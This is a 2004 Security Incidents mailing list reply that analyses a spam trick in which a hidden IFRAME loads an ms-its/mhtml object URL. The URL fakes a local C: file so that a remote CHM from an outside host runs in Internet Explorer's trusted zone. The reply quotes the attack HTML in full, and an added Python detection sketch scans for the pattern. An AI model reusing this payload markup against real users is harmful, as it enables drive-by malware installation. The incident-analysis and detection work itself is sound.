Security Incidents mailing list archives

Re: A new technique to disguise a target URL in spam


From: Jeremiah Cornelius <jeremiah () nur net>
Date: Mon, 5 Apr 2004 08:18:58 -0700

On Sunday 04 April 2004 17:18, DCISS wrote:
> I wasn't going to risk my home
> computer on an unsafe link, and by the time I tried on a work computer,
> the site was down, so I don't know what clicking on the link would have
> downloaded.  Has anybody else seen this technique before, or know what
> was being propagated?

They are hiding a compiled help extension behind a URL that fakes being local 
to C: - forcing the appearance of the file in the local, trusted zone with 
IE.

wget http://anz.com | less :

        <IFRAME src="http://salecheap.net/test.htm"; width=1 height=1    
        style="display:none">
        </IFRAME>
        <body onload="location.href='http://anz.com'";>
        anz.htm (END)

wget http://salecheap.net/test.htm | less :

        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
        <html>
        <head>
        <title>Please wait...</title>
        </head>
        <body>
        <object data="ms-its:mhtml:file://C 
        \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm";
        type="text/x-scriptlet"></object>
        </body>
        </html>
        test.htm (END)
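
A detection sketch for the pattern described in this message, added here as an example and not part of the original post: it scans HTML for URL attributes that invoke the HTML Help / MHTML protocol handlers and reports when a remote CHM is chained after the `!` separator behind a local `file://` decoy. The sample input is constructed, `example.invalid` is a placeholder host, and the function and field names are hypothetical.

```python
import re
from html.parser import HTMLParser

# Protocol handlers that pass content to HTML Help / MHTML in Internet Explorer.
HELP_SCHEMES = ("ms-its:", "its:", "mk:@msitstore:", "mhtml:")
URL_ATTRS = {"data", "src", "href", "codebase"}
REMOTE = re.compile(r"!(https?://[^\"'>]+)", re.I)

class HelpHandlerScanner(HTMLParser):
    """Records every URL attribute that starts with a help-protocol scheme."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            # Collapse whitespace: line wrapping often splits these long URLs.
            url = re.sub(r"\s+", "", value)
            low = url.lower()
            if not low.startswith(HELP_SCHEMES):
                continue
            remote = REMOTE.search(url)
            self.findings.append({
                "tag": tag,
                "attr": name,
                # A file:// reference placed ahead of the '!' separator.
                "local_decoy": "file://" in low.split("!")[0],
                # Remote archive fetched after '!', minus the '::' inner path.
                "remote_payload": remote.group(1).split("::")[0] if remote else None,
            })

def scan(html):
    scanner = HelpHandlerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: one chained remote reference, one ordinary local help link.
SAMPLE = r'''<body>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://example.invalid//main.chm::/main.htm"
 type="text/x-scriptlet"></object>
<a href="ms-its:C:\app\help.chm::/index.htm">local help</a>
</body>'''

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with both `local_decoy` set and a non-empty `remote_payload` matches the shape of the `test.htm` page quoted above; a finding with neither is an ordinary local help link.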


